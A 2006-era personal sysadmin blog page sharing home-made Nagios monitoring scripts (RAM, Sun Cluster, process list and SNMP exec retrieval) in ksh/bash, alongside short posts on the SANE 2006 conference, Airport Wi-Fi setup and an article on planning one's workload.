        echo ""
        echo "Basic processes list monitor plugin for Nagios"
        echo ""
        echo "This plugin not developped by the Nagios Plugin group."
        echo "Please do not e-mail them for support on this plugin, since"
        echo "they won't know what you're talking about :P"
        echo ""
        echo "For contact info, read the plugin itself..."
}

while test -n "$1" 
do
        case "$1" in
          --help) print_help; exit $STATE_OK;;
          -h) print_help; exit $STATE_OK;;
          *) print_usage; exit $STATE_UNKNOWN;;
        esac
done


### FINALLY THE MAIN ROUTINE ###

COUNT="0"
DOWN=""

for PROCESS in `echo $LIST`
do
        if [ `ps -ef | grep -i $PROCESS | grep -v grep | wc -l` -lt 1 ]
        then
                let COUNT=$COUNT+1
                DOWN="$DOWN $PROCESS"
        fi
done

if [ $COUNT -gt 0 ]
then
        echo "NOK - $COUNT processes not running: $DOWN"
        exit $STATE_CRITICAL
fi

# Nothing caused us to exit early, so we're okay.
echo "OK - All requisite processes running."
exit $STATE_OK


kilala.nl tags: , , ,

View or add comments (curr. 2)

Nagios script: check_ram

2006-06-01 00:00:00

This script was written at the time I was hired by UPC / Liberty Global.

Basic monitor to check percentage of used physical RAM.

This script was quickly hacked together for my current customer, as a Q&D solution for their monitoring needs. It's no beauty, but it works. It is written in ksh and was tested on Solaris.

UPDATE 19/06/2006:

Cleaned up the script a bit and added some checks that are considered the Right Thing to do. Should have done this -way- earlier!

I've also -finally- changed the script so that it takes the Warning and Critical percentages from the command line.

UPDATE 15/07/2006:

Whoops... I just noticed that the file had gone missing <3
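
One thing worth spelling out: the two arguments are the percentages of physical RAM that must remain free, not the percentages in use. For example:

# Warn when less than 15% of RAM is free, go critical below 5% free;
# in other words, start alerting once roughly 85% of RAM is in use.
./check_ram 15 5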



#!/bin/ksh
#
# Free physical RAM monitor plugin for Nagios
# Written by Thomas Sluyter (nagiosATkilalaDOTnl)
# By request of DTV Labs, Liberty Global, the Netherlands
# Last Modified: 20-10-2006
# 
# Usage: ./check_ram
#
# Description:
# This plugin determines how much of the physical RAM in the 
# system is in use.
#
# Limitations:
# Currently this plugin will only function correctly on Solaris systems.
# And it really is only usefull at DTV Labs.
#
# Output:
# The script returns either a WARN or a CRIT, depending on the 
# percentage of free physical memory.
#

# Enabling the following dumps information into DEBUGFILE at various
# stages during the execution of this script.
DEBUG="1"
DEBUGFILE="/tmp/foobar"
rm $DEBUGFILE >/dev/null 2>&1
echo "Starting script check_ram." > $DEBUGFILE

# Host OS check and warning message
if [ `uname` != "SunOS" ]
then
        echo "WARNING:"
        echo "This script was originally written for use on Solaris."
        echo "You may run into some problems running it on this host."
        echo ""
        echo "Please verify that the script works before using it in a"
        echo "live environment. You can easily disable this message after"
        echo "testing the script."
        echo ""
        exit 1
fi

# You may have to change this, depending on where you installed your
# Nagios plugins
PATH="/usr/bin:/usr/sbin:/bin:/usr/local/bin:/sbin"
LIBEXEC="/usr/local/nagios/libexec"
. $LIBEXEC/utils.sh

print_usage() {
        echo "Usage: $PROGNAME warning-percentage critical-percentage"
        echo ""
        echo "e.g. : $PROGNAME 15 5"
        echo "This will start alerting when more than 85% of RAM has"
        echo "been used."
        echo ""
}

print_help() {
        echo ""
        print_usage
        echo ""
        echo "Free physical RAM plugin for Nagios"
        echo ""
        echo "This plugin not developped by the Nagios Plugin group."
        echo "Please do not e-mail them for support on this plugin, since"
        echo "they won't know what you're talking about :P"
        echo ""
        echo "For contact info, read the plugin itself..."
}

if [ $# -lt 2 ]; then print_help; exit $STATE_WARNING;fi

case "$1" in
        --help) print_help; exit $STATE_OK;;
        -h) print_help; exit $STATE_OK;;
        *) if [  $# -lt 2 ]; then print_help; exit $STATE_WARNING;fi ;;
esac

RAM_WARN=$1
RAM_CRIT=$2
[ $DEBUG -gt 0 ] && echo "Warning and Critical percentages are $RAM_WARN and $RAM_CRIT." >> $DEBUGFILE

if [ $RAM_WARN -le $RAM_CRIT ]
then
        echo "Warning percentage should be larger than critical percentage."
        exit $STATE_WARNING
fi

check_space()
{
[ $DEBUG -gt 0 ] && echo "Starting check_space." >> $DEBUGFILE
        TOTALSPACE=0
        TOTALSPACE=`prtconf | grep ^"Memory size" | awk '{print $3}'`
[ $DEBUG -gt 0 ] && echo "Total space is $TOTALSPACE." >> $DEBUGFILE

        TOTALFREE=0
        TOTALFREE=`vmstat 2 2 | tail -1 | awk '{print $5}'`
[ $DEBUG -gt 0 ] && echo "Free space is $TOTALFREE." >> $DEBUGFILE
        let TOTALFREE=$TOTALFREE/1000
[ $DEBUG -gt 0 ] && echo "Free space, div1000 is $TOTALFREE." >> $DEBUGFILE
}

check_percentile() 
{
[ $DEBUG -gt 0 ] && echo "Starting check_percentile." >> $DEBUGFILE
        FRACTION=`echo "scale=2; $TOTALFREE/$TOTALSPACE" | bc`
[ $DEBUG -gt 0 ] && echo "Fraction is $FRACTION." >> $DEBUGFILE

        PERCENT=`echo "scale=2; $FRACTION*100" | bc | awk -F. '{print $1}'`
[ $DEBUG -gt 0 ] && echo "Percentile is $PERCENT." >> $DEBUGFILE

        if [ $PERCENT -lt $RAM_CRIT ]; then
[ $DEBUG -gt 0 ] && echo "$PERCENT is smaller than $RAM_CRIT. Critical." >> $DEBUGFILE
          echo "RAM NOK - Less than $RAM_CRIT % of physical RAM is unused."
          exitstatus=$STATE_CRITICAL
          exit $exitstatus
        fi

        if [ $PERCENT -lt $RAM_WARN ]; then
[ $DEBUG -gt 0 ] && echo "$PERCENT is smaller than $RAM_WARN. Warning." >> $DEBUGFILE
          echo "RAM NOK - Less than $RAM_WARN % of physical RAM is unused."
          exitstatus=$STATE_WARNING
          exit $exitstatus
        fi
}

check_space
check_percentile

[ $DEBUG -gt 0 ] && echo "$PERCENT is greater than $RAM_WARN. OK." >> $DEBUGFILE
echo "RAM OK - $TOTALFREE MB out of $TOTALSPACE MB RAM unused."
exitstatus=$STATE_OK
exit $exitstatus



kilala.nl tags: , , ,

View or add comments (curr. 0)

Nagios script: check_suncluster

2006-06-01 00:00:00

This script was written at the time I was hired by KPN i-Diensten. It is reproduced/shared here with their permission.

A few of our projects and services are run on Solaris systems running Sun Cluster software. Since there were no Nagios scripts available to perform checks against Sun Cluster I made a basic script that checks the most important factors.

This script performs a different function, depending on the parameter with which it is called. This allows you to define multiple service checks in Nagios, without needing separate check scripts for each.
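
To illustrate (this is just a sketch, with made-up command names): the corresponding entries in checkcommands.cfg could look something like the following, assuming $USER1$ points at your libexec directory.

define command{
        command_name    check_suncluster_quorum
        command_line    $USER1$/check_suncluster -q
        }

define command{
        command_name    check_suncluster_rg
        command_line    $USER1$/check_suncluster -G $ARG1$
        }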

EDIT:

Oh! Just like my other recent Nagios scripts, check_suncluster comes with a debugging option. Set $DEBUG at the top of the file to anything larger than zero and the script will dump information at various stages of its execution. And like my other recent scripts, it also comes with its own test script (reproduced below, right after the plugin itself).



#!/usr/bin/ksh
#
# Nagios check script for Sun Cluster.
# Written by Thomas Sluyter (nagiosATkilalaDOTnl)
# By request of KPN-IS, i-Provide SYS, the Netherlands
# Last Modified: 25-09-2006
#
# Usage: ./check_suncluster [-t, -q, -g, -G resource-group, -r, -R resource, -i]
#
# Description:
# This script is capable of performing a number of basic checks on a 
# system running Sun Cluster. Depending on the parameter you pass to 
# it, it will check:
# * Transport paths (-t).
# * Quorum (-q).
# * Resource groups (-g).
# * One selected resource group (-G).
# * Resources (-r).
# * One selected resource (-R).
# * IPMP groups (-i).
#
# Limitations:
# This script will only work with Korn shell, due to some funky while
# looping with pipe forking. Bash doesn't handle this very gracefully,
# due to its sub-shell variable scoping. Maybe I really should learn
# to program in Perl.   
#
# Output:
# * Transport paths return a WARN when one of the paths is down and a
#   CRIT when all paths are offline. 
# * Quorum returns a WARN when not all, but enough quorum devices are
#   available. It returns a CRIT when quorum cannot be reached.
# * Resource groups returns a CRIT when a group is offline on all nodes
#   and a WARN if a group is in an unstable state.
# * Resources returns a CRIT when a resource is offline on all nodes
#   and a WARN if a resource is in an unstable state.
# * IPMP groups returns a CRIT when a group is offline.
#
# Other notes:
# Aside from the debugging output that I've built into most of my recent
# scripts, this check script will also have a testing mode  hacked on, as
# a bag on the side. This testing mode is only engaged when the test_check_suncluster
# script is being run and will intentionally "break" a few things, to 
# verify the failure options of this check script.
#

# Enabling the following dumps information into DEBUGFILE at various
# stages during the execution of this script.
DEBUG=0
DEBUGFILE="/tmp/foobar"

if [ -f /tmp/neko-wa-baka ]
then
	if [ `cat /tmp/neko-wa-baka` == "Nyo!" ]
	then
	   TESTING="1"
	else
	   TESTING="0"
	fi
else
	TESTING="0"
fi


### REQUISITE NAGIOS USER INTERFACE STUFF ###

# You may have to change this, depending on where you installed your
# Nagios plugins
PATH="/usr/bin:/usr/sbin:/bin:/sbin:/usr/cluster/bin"
LIBEXEC="/usr/local/nagios/libexec"
PROGNAME="check_suncluster"
. $LIBEXEC/utils.sh

[ $DEBUG -gt 0 ] && rm $DEBUGFILE 

print_usage() {
        echo "Usage: $PROGNAME [-t, -q, -g, -G resource-group, -r, -R resource, -i]"
        echo "Usage: $PROGNAME --help"
}

print_help() {
        echo ""
        print_usage
        echo ""
        echo "Sun Cluster check plugin for Nagios"
        echo ""
        echo "-t: check transport paths"
        echo "-q: check quorum"
        echo "-g: check resource groups"
        echo "-G: check one individual resource group"
        echo "-r: check all resources"
        echo "-R: check one individual resources"
        echo "-i: check IPMP groups"
        echo ""
        echo "This plugin not developped by the Nagios Plugin group."
        echo "Please do not e-mail them for support on this plugin, since"
        echo "they won't know what you're talking about :P"
        echo ""
        echo "For contact info, read the plugin itself..."
}


### SUB-ROUTINE DEFINITIONS ### 

function check_transport_paths
{
[ $DEBUG -gt 0 ] && echo "Starting check_transport_path subroutine." >> $DEBUGFILE

	TOTAL=`scstat -W | grep "Transport path:" | wc -l`
	let COUNT=0

	scstat -W | grep "Transport path:" | awk '{print $3" "$6}' | while read PATH STATUS
	do
[ $DEBUG -gt 0 ] && echo "Before math, Count has the value of $COUNT." >> $DEBUGFILE
		if [ $STATUS == "online" ]
		then
		   let COUNT=$COUNT+1
		fi
[ $DEBUG -gt 0 ] && echo "Path: $PATH has status $STATUS" >> $DEBUGFILE
[ $DEBUG -gt 0 ] && echo "Count: $COUNT online transport paths." >> $DEBUGFILE
	done

[ $DEBUG -gt 0 ] && echo "Count: Outside the loop it has a value of $COUNT." >> $DEBUGFILE
[ $TESTING -gt 0 ] && COUNT="0"

	if [ $COUNT -lt 1 ]
	then
	   echo "NOK - No transport paths online."
	   exit $STATE_CRITICAL
	elif [ $COUNT -lt $TOTAL ]
	then
	   echo "NOK - One or more transport paths offline."
	   exit $STATE_WARNING
	fi
}

function check_quorum
{
[ $DEBUG -gt 0 ] && echo "Starting check_quorum subroutine." >> $DEBUGFILE
	NEED=`scstat -q | grep "votes needed:" | awk '{print $4}'`
	PRES=`scstat -q | grep "votes present:" | awk '{print $4}'`

[ $DEBUG -gt 0 ] && echo "Quorum needed: $NEED" >> $DEBUGFILE
[ $DEBUG -gt 0 ] && echo "Quorum present: $PRES" >> $DEBUGFILE

[ $TESTING -gt 0 ] && PRES="0"
	if [ $PRES -ge $NEED ]
	then
[ $DEBUG -gt 0 ] && echo "Enough quorum votes." >> $DEBUGFILE
		scstat -q | grep "votes:" | awk '{print $3" "$6}' | while read VOTE STATUS
		do
[ $DEBUG -gt 0 ] && echo "Vote: $VOTE has status $STATUS." >> $DEBUGFILE
			if [ $STATUS != "Online" ] 
			then
			   echo "NOK - Quorum vote $VOTE not available."
			   exit $STATE_WARNING
			fi
		done		
	else
[ $DEBUG -gt 0 ] && echo "Not enough quorum." >> $DEBUGFILE
		echo "NOK - Not enough quorum votes present."
		exit $STATE_CRITICAL
	fi
}

function check_resource_groups
{
[ $DEBUG -gt 0 ] && echo "Starting check_resource_groups subroutine." >> $DEBUGFILE
	scstat -g | grep "Group:" | awk '{print $2}' | sort -u | while read GROUP
	do
	ONLINE=`scstat -g | grep "Group: $GROUP" | grep "Online" | wc -l`
	WEIRD=`scstat -g | grep "Group: $GROUP" | grep -v "Resources" | grep -v "Online" | grep -v "Offline" | wc -l`
[ $DEBUG -gt 0 ] && echo "Resource Group $GROUP has $ONLINE instances online." >> $DEBUGFILE
[ $DEBUG -gt 0 ] && echo "Resource Group $GROUP has $WEIRD instances in a weird state." >> $DEBUGFILE
[ $TESTING -gt 0 ] && ONLINE="0"
		if [ $ONLINE -lt 1 ] 
		then
		   echo "NOK - Resource group $GROUP not online."
		   exit $STATE_CRITICAL
		fi
                if [ $WEIRD -gt 1 ]
                then
                   echo "NOK - Resource group $GROUP is an unstable state."
                   exit $STATE_WARNING
                fi
	done
}

function check_resource_grp
{
[ $DEBUG -gt 0 ] && echo "Starting check_resource_grp subroutine." >> $DEBUGFILE
[ $DEBUG -gt 0 ] && echo "Selected group: $RGROUP" >> $DEBUGFILE
	ONLINE=`scstat -g | grep $RGROUP | grep "Online" | wc -l`
	WEIRD=`scstat -g | grep $RGROUP | grep -v "Resources" | grep -v "Online" | grep -v "Offline" | wc -l`
[ $DEBUG -gt 0 ] && echo "Resource Group $GROUP has $ONLINE instances online." >> $DEBUGFILE
[ $DEBUG -gt 0 ] && echo "Resource Group $GROUP has $WEIRD instances in a weird state." >> $DEBUGFILE
[ $TESTING -gt 0 ] && ONLINE="0"
	if [ $ONLINE -lt 1 ] 
	then
	   echo "NOK - Resource group $RGROUP not online."
	   exit $STATE_CRITICAL
	fi
	if [ $WEIRD -gt 1 ]
        then
           echo "NOK - Resource group $RGROUP is in an unstable state."
           exit $STATE_WARNING
        fi
}

function check_resources
{
[ $DEBUG -gt 0 ] && echo "Starting check_resources subroutine." >> $DEBUGFILE
	RESOURCES=`scstat -g | grep "Resource:" | awk '{print $2}' | sort -u`
[ $DEBUG -gt 0 ] && echo "List of resources to check: $RESOURCES" >> $DEBUGFILE
	for RESOURCE in `echo $RESOURCES`
	do
	ONLINE=`scstat -g | grep "Resource: $RESOURCE" | awk '{print $4}' | grep "Online" | wc -l` 
	WEIRD=`scstat -g | grep "Resource: $RESOURCE" | awk '{print $4}' | grep -v "Online" | grep -v "Offline" | wc -l`
[ $DEBUG -gt 0 ] && echo "Resource $RESOURCE has $ONLINE instances online." >> $DEBUGFILE
[ $DEBUG -gt 0 ] && echo "Resource $RESOURCE has $WEIRD instances in a weird state." >> $DEBUGFILE
[ $TESTING -gt 0 ] && ONLINE="0"
		if [ $ONLINE -lt 1 ] 
		then
		   echo "NOK - Resource $RESOURCE not online."
		   exit $STATE_CRITICAL
		fi
                if [ $WEIRD -gt 1 ]
                then
                   echo "NOK - Resource $RESOURCE is in an unstable state."
                   exit $STATE_WARNING
                fi
	done
}

function check_rsrce
{
[ $DEBUG -gt 0 ] && echo "Starting check_rsrce subroutine." >> $DEBUGFILE
[ $DEBUG -gt 0 ] && echo "Selected resource: $RSRCE" >> $DEBUGFILE
	ONLINE=`scstat -g | grep "Resource: $RSRCE" | awk '{print $4}' | grep "Online" | wc -l`
	WEIRD=`scstat -g | grep "Resource: $RSRCE" | awk '{print $4}' | grep -v "Online" | grep -v "Offline" | wc -l`
[ $DEBUG -gt 0 ] && echo "Resource $RESOURCE has $ONLINE instances online." >> $DEBUGFILE
[ $DEBUG -gt 0 ] && echo "Resource $RESOURCE has $WEIRD instances in a weird state." >> $DEBUGFILE
[ $TESTING -gt 0 ] && ONLINE="0"
	if [ $ONLINE -lt 1 ] 
	then
	   echo "NOK - Resource $RESOURCE not online."
	   exit $STATE_CRITICAL
	fi
	if [ $WEIRD -gt 1 ]
        then
           echo "NOK - Resource $RESOURCE is in an unstable state."
           exit $STATE_WARNING
        fi
}

function check_ipmp
{
[ $DEBUG -gt 0 ] && echo "Starting check_ipmp subroutine." >> $DEBUGFILE
	scstat -i | grep "IPMP Group:" | awk '{print $3" "$5}' | while read GROUP STATUS
	do
[ $DEBUG -gt 0 ] && echo "IPMP Group: $GROUP has status $STATUS" >> $DEBUGFILE
		if [ $STATUS != "Online" ] 
		then
		   echo "NOK - IPMP group $GROUP not online."
		   exit $STATE_CRITICAL
		fi
if [ $TESTING -gt 0 ]
then
   echo "NOK - IPMP group $GROUP not online."
   exit $STATE_CRITICAL
fi
	done
}

### THE MAIN ROUTINE FINALLY STARTS ###

[ $DEBUG -gt 0 ] && echo "Starting main routine." >> $DEBUGFILE

if [ $# -lt 1 ]
then
	print_usage
	exit $STATE_UNKNOWN
fi

[ $DEBUG -gt 0 ] && echo "More than one argument." >> $DEBUGFILE
[ $DEBUG -gt 0 ] && echo "" >> $DEBUGFILE

case "$1" in
	--help) print_help; exit $STATE_OK;;
	-h) print_help; exit $STATE_OK;;
	-t) check_transport_paths;;
	-q) check_quorum;;
	-g) check_resource_groups;;
	-G) RGROUP="$2"; check_resource_grp;;
	-r) check_resources;;
	-R) RSRCE="$2"; check_rsrce;;
	-i) check_ipmp;;
	*) print_usage; exit $STATE_UNKNOWN;;
esac

[ $DEBUG -gt 0 ] && echo "No problems. Exiting normally." >> $DEBUGFILE

# None of the other subroutines forced us to exit 1 before here, so let's quit with a 0.
echo "OK - Everything running like it should"
exit $STATE_OK

And here is the accompanying test script, test_check_suncluster:

#!/usr/bin/bash

function testrun()
{
	echo "Running without parameters."
	/usr/local/nagios/libexec/check_suncluster 
	echo "Exit code is $?."
	echo ""

	echo "Testing transport paths."
	/usr/local/nagios/libexec/check_suncluster -t
	echo "Exit code is $?."
	echo ""

	echo "Quorum votes."
	/usr/local/nagios/libexec/check_suncluster -q
	echo "Exit code is $?."
	echo ""

	echo "Checking all resource groups."
	/usr/local/nagios/libexec/check_suncluster -g
	echo "Exit code is $?."
	echo ""

	echo "Checking individual resource groups."
	for GROUP in `scstat -g | grep "Group:" | awk '{print $2}' | sort -u`
	do
		echo "Running for group $GROUP."
		/usr/local/nagios/libexec/check_suncluster -G $GROUP
		echo "Exit code is $?."
		echo ""
	done

	echo "Checking all resources."
	/usr/local/nagios/libexec/check_suncluster -r
	echo "Exit code is $?."
	echo ""
	
	echo "Checking all resources."
	for RESOURCE in `scstat -g | grep "Resource:" | awk '{print $2}' | sort -u`
	do
		echo "Running for resource $RESOURCE."
		/usr/local/nagios/libexec/check_suncluster -R $RESOURCE
		echo "Exit code is $?."
		echo ""
	done
	
	echo "Checking IPMP groups."
	/usr/local/nagios/libexec/check_suncluster -i
	echo "Exit code is $?."
	echo ""
}

function breakstuff()
{
	# Now we'll start breaking things!!
	echo ""
	echo "Now it's time to start breaking things! Gruaargh!"
	echo "Mind you, it's all fake and simulated. I am not changing -anything-"
	echo "about the cluster itself."
	echo ""
	
	echo "Nyo!" > /tmp/neko-wa-baka 
}

echo "Starting clean"
rm /tmp/neko-wa-baka /tmp/foobar >/dev/null 2>&1
echo ""

testrun
breakstuff
testrun

echo "Starting clean at the end"
rm /tmp/neko-wa-baka  >/dev/null 2>&1
echo ""

kilala.nl tags: , , ,

View or add comments (curr. 2)

Nagios script: retrieve_custom_snmp

2006-06-01 00:00:00

This script was written while I was hired by KPN i-Diensten. It is reproduced/shared here with their permission.

One of the things we've been looking into recently, is running the standard Nagios plugins through SNMP instead of through NRPE. Putting aside the discussion of the various merits and flaws such a solution has, let's say that it works nicely.

How do you do this?

In your snmpd.conf add a line like:

exec .1.3.6.1.4.1.6886.4.1.1 check_load /usr/local/nagios/libexec/check_load

exec .1.3.6.1.4.1.6886.4.1.2 check_mem /usr/local/nagios/libexec/check_mem -w 85 -c 95

exec .1.3.6.1.4.1.6886.4.1.3 check_swap /usr/local/nagios/libexec/check_swap -w 15% -c 5%

What this does is tell the SNMP daemon to run the check_load script when someone asks for object .1.3.6.1.4.1.6886.4.1.1 (or .2, or .3). The exit code for the script will be placed in OID.100.1 and the first line of output will be placed in OID.101.1. This script retrieves those two values through SNMP and returns them to Nagios.
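
If you want to verify the plumbing by hand before wiring it into Nagios, you can query the two objects directly. The snmpget options below match the ones used inside the retrieval script; the host name "clienthost" and the "public" community are of course placeholders.

# Exit code of the check_load run defined above
snmpget -Oqv -v 2c -c public clienthost .1.3.6.1.4.1.6886.4.1.1.100.1
# First line of its output
snmpget -Oqv -v 2c -c public clienthost .1.3.6.1.4.1.6886.4.1.1.101.1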

Your checkcommands.cfg should contain something like:

define command{
        command_name    retrieve_custom_snmp
        command_line    $USER1$/retrieve_custom_snmp -H $HOSTADDRESS$ -o $ARG1$
}

The "-o" parameter takes the OID you have selected for your custom check.

Now... How do you select an OID? There's two ways:

1. The WRONG way = randomly selecting some OID. You might pick an OID which is needed for other monitoring purposes in your network.

2. The RIGHT way = requesting a private Enterprise ID for your company at IANA. You are free to build an SNMP tree beneath this EID. For example, the EID 6886 mentioned above is registered to KPN (my current client). The sub-tree .4.1 contains all OIDs referring to Nagios checks performed by my department.

Before sending out that request, please check the current EID list to see if your company already owns a private subtree. If that's the case, contact the "owner" to request your own part of the subtree.

UPDATE (2006-10-02):

Thanks to the kind folks on the Nagios Users ML I've found out that my original version of the script was totally bug-ridden. I've made a big bunch of adjustments and now the script should work properly. Thanks especially to Andreas Ericsson.



#!/bin/bash
#
# Script to retrieve custom SNMP objects set using the "exec" handler
# Written by Thomas Sluyter (nagiosATkilalaDOTnl)
# By request of KPN-IS, i-Provide, the Netherlands
# Last Modified: 18-07-2006
# 
# Usage: ./retrieve_custom_snmp
#
# Description:
#   On our Nagios client systems we use a lot of custom MIB OIDs which are
# registered under our own Enterprise ID. A whole bunch of the 
# original Nagios scripts are run through the SNMP daemon and their exit
# codes and output are appended to specific OIDs. This all happens using the
# SNMP "exec" handler.
#   Unfortunately the default check_snmp script doesn't allow for easy 
# handling of these objects, so I hacked together a quick script. 
#
# So basically this script doesn't do any checking. It just retrieves 
# information :)
#
# Limitations:
# This script should work properly on all implementations of Linux, Solaris
# and Mac OS X.
#
# Output:
# The exit code is the exit code retrieved from OID.100.1. It is temporarily
# stored in $EXITCODE.
# The output string is the string retrieved from OID.101.1. It is tempo-
# rarily stored in $OUTPUT.
#
# Other notes:
#   If you ever run into problems with the script, set the DEBUG variable
# to 1. I'll need the output the script generates to do troubleshooting.
# See below for details.
#   I realise that all the debugging commands strewn throughout the script
# may make things a little harder to read. But in the end I'm sure it was
# well worth adding them. It makes troubleshooting so much easier. :3
#   Also, for some reason the case statement with the shifts (to detect
# passed options) doesn't seem to be working right. FIXME!
#
# Check command definition:
# define command{
#       command_name    retrieve_custom_snmp
#       command_line    $USER1$/retrieve_custom_snmp -H $HOSTADDRESS$ -o $ARG1$
#		}
#

# You may have to change this, depending on where you installed your
# Nagios plugins
PATH="/usr/bin:/usr/sbin:/bin:/sbin"
LIBEXEC="/usr/local/nagios/libexec"
. $LIBEXEC/utils.sh
PROGNAME="retrieve_custom_snmp"
COMMUNITY="public"

[ `uname` == "SunOS" ] && SNMPGET="/usr/local/bin/snmpget -Oqv -v 2c -c $COMMUNITY"
[ `uname` == "Darwin" ] && SNMPGET="/usr/bin/snmpget -Oqv -v 2c -c $COMMUNITY"
[ `uname` == "Linux" ] && SNMPGET="/usr/bin/snmpget -Oqv -v 2c -c $COMMUNITY"

### DEBUGGING SETUP ###
# Cause you never know when you'll need to squash a bug or two
DEBUG="0"

if [ $DEBUG -gt 0 ]
then
        DEBUGFILE="/tmp/foobar"
        rm $DEBUGFILE >/dev/null 2>&1
fi


### REQUISITE NAGIOS COMMAND LINE STUFF ###

print_usage() {
	echo "Usage: $PROGNAME -H hostname -o OID"
	echo "Usage: $PROGNAME --help"
}

print_help() {
	echo ""
	print_usage
	echo ""
	echo "Script to retrieve the status for custom SNMP objects."
	echo ""
	echo "This plugin not developped by the Nagios Plugin group."
	echo "Please do not e-mail them for support on this plugin, since"
	echo "they won't know what you're talking about :P"
	echo ""
	echo "For contact info, read the plugin itself..."
}

while test -n "$1"; do
    case "$1" in
        --help)
            print_help
            exit $STATE_OK
            ;;
        -h)
            print_help
            exit $STATE_OK
            ;;
        -H)
			HOST=$2
	        shift
            ;;
        -o)
	    	OID=$2
	    	STATUS="$OID.100.1"
	    	STRING="$OID.101.1"
            shift
            ;;
        *)
            echo "Unknown argument: $1"
            print_usage
            exit $STATE_UNKNOWN
            ;;
    esac
    shift
done


### FINALLY... RETRIEVING THE VALUES ###

EXITCODE=`$SNMPGET $HOST $STATUS`
[ $DEBUG -gt 0 ] && echo "Retrieve exit code is $EXITCODE" >> $DEBUGFILE
 
OUTPUT=`$SNMPGET $HOST $STRING | sed 's/"//g'`
[ $DEBUG -gt 0 ] && echo "Retrieve status message is: $OUTPUT" >> $DEBUGFILE

echo $OUTPUT
exit $EXITCODE


kilala.nl tags: , , ,

View or add comments (curr. 0)

Attending the SANE 2006 conference

2006-05-18 14:31:00

Thought I'd give you a little update from SANE'06. I'll keep it short, since there isn't a horrible lot to tell.

* Monday: Linux SysAd course was cancelled so me and Frank switched over to the IPSec course. This was 100% new material to me and (while boring at times) it was quite interesting. Now I'll at least know what people are talking about.

* Tuesday: The Solaris SMF tutorial was well worth the money, although a full day would've suited the material -much- better than half a day. In the AM I decided to crash the BSD Packet Filter tutorial and I guess the tutor should be happy I did. He had some trouble with the Powerbook used for the presentation and I was able to resolve his problems :)

* Wednesday: A full day of CF Engine, which was -totally- worth the money! Mark Burgess is an awesome speaker! Funny, smart and capable of conveying the heart of the matter. I'd have loved to have this guy as a teacher in college!

* Thursday: As I suspected the conference itself is quite "meh". A few interesting speeches throughout the day, but I'm mostly taking things slowly. Instead I'm reading a bit in my new books. Unfortunately I slept -horribly- last night, so I'll be skipping the Social Event in the evening. :(


kilala.nl tags: , , , ,

View or add comments (curr. 0)

Travelling to SANE 2006 in Delft.

2006-05-15 18:17:00

The next few days I'll be cooped up in a hotel in Delft with my colleague Frank. We'll be visiting the Sane 2006 conference, which is a combination of vacation and studying. The first three days will consist of tutorials, with the remaining two being filled with various talks and keynotes. Should anyone feel the need to hook up with me, I'll be taking the following lectures:

* Monday = Linux system administration

* Tuesday = The Solaris service management facility

* Wednesday = Host configuration and maintenance with CFEngine

* Naturally we'll also be attending the Social Event on Thursday.

Just look for the guy with the funky iBook and the Snow t-shirt. <3


kilala.nl tags: , , ,

View or add comments (curr. 0)

I get published! Again :)

2006-02-06 20:37:00

Pride++

Today I received my copy of February's issue of ;Login: which contains the publication of my most recent article. The one about planning projects and your personal time. I love having stuff published. Once Anime Con 2006 is over and done with I'll probably write some more articles! Speaking of Anime Con, I'd better get to work before going to bed :p


kilala.nl tags: , ,

View or add comments (curr. 0)

Using Airport Express with OSX and Windows

2006-01-27 06:36:00

We all know I love just about anything Apple Computers makes. There's no secret in that. However, I myself was very much amazed at the ease of setup when it comes to an Airport Wifi network. Yesterday I received the Airport Express base station and the Airport Extreme Card that I'd ordered through the Apple Store. Looking forward to an evening filled with tweaking and fiddling, I was pleasantly surprised that all it took was fifteen minutes! And that includes installing the AE Card into my Powermac. It really is just as easy as plugging it in :)

I also had expected to have loads of problems to get Windows XP to work with Wifi, after hearing horror stories. And like I had feared Marli's laptop refused to talk to our newly built Wifi network "Kilala" ( original name, ain't it? :P ). However, that was easily fixed by completely reconfiguring the base station using the Windows software. Now the laptop had no qualms in connecting to the network and my Apple computers still attached flawlessly.

I'm one happy camper! Now all we need to do is to wait for Casema to deliver the cable modem, so we can get hooked up to the Internet again. The parcel gets delivered on Valentine's Day :D Awesome!


kilala.nl tags: , , ,

View or add comments (curr. 0)

Keeping track of time. Thomas discusses the art of planning your workload

2005-11-24 08:30:00

A PDF version of this document is available. Get it over here.

Way back in 1999 when I started my second internship I was told to do something that I had never done before: create and maintain a planning of my activities.

At the time this seemed like a horribly complex thing to do, but my supervisor was adamant. He did not want me to shift one bit of work before I had taken a stab at a rough planning. So I twiddled in Word and I fumbled in Excel and finally, an hour or two later, I had finished my first project planning ever. And there was much rejoicing!... Well, not really, but I felt that a Monty Python reference would be welcome right about now...

So now it's six years later and I still benefit from the teachings of my past mentor. However, around me I see people who appear to have trouble keeping track of all of their work. Which is exactly why I was originally asked to write this article.

I have always worked in large corporate environments with several layers of management between the deities and me, which always seems to obfuscate matters to no end. However, the ideas outlined in the next few paragraphs will be applicable to anyone in any situation.

Juggling egg shells

"They [hackers] tend to be careful and orderly in their intellectual lives and chaotic elsewhere. Their code will be beautiful, even if their desks are buried in 3 feet of crap."

From "The new hacker's dictionary"

I realize that keeping a planning is definitely not one of the favorite activities for most people in IT. Most of them seem to abhor the whole task, or fail to see its importance. Also, most are of the opinion that they don't have enough time as it is and that there is absolutely no way that they can fit in the upkeep of a personal planning.

Now here's a little secret: the one thing that can help you keep your workload in check IS a planning! By keeping record of all of your projects and other activities you can show management how heavily you're loaded and at which points in time you will be available for additional duties. By providing management with these details they will be able to make decisions like lowering your workload, or adding more people to the workforce.

In this article I will discuss the aspects of making and maintaining a proper personal planning. I will touch on the following subjects:

Personal time vs. Project time

A personal planning is what dictates your day-to-day activities. You use it to keep track of meetings, miscellaneous smaller tasks and time slots that you have reserved for projects. You could say that it's your daily calendar and most people will actually use one (a calendar that is) for this task. In daily life your colleagues and supervisor can use your personal planning to see when you're available for new tasks.

A project planning on the other hand is an elaborate schedule, which dictates the flow of a large project. Each detail will be described meticulously and will receive its own place in time. Depending on the structure of your organization such a plan will be drafted either by yourself, or by so-called project managers who have been specifically hired for that task.

Tools of the trade

"Life is what happens to you, when you're making other plans."

John Lennon

Keeping your personal calendar

I think it's safe to assume that everyone has the basic tools that are needed to keep track of your personal planning. Just about every workstation comes with at least some form of calendar software, which will be more or less suitable.

Microsoft Outlook and Exchange come with a pretty elaborate calendar, as well as a To Do list. These can share information transparently, so you can easily assign a task a slot in your personal planning. Each event in your calendar can be opened up to add very detailed information regarding each task. Also, you and your colleagues can give each other access to your calendars if your organization has a central Exchange server at its disposal.

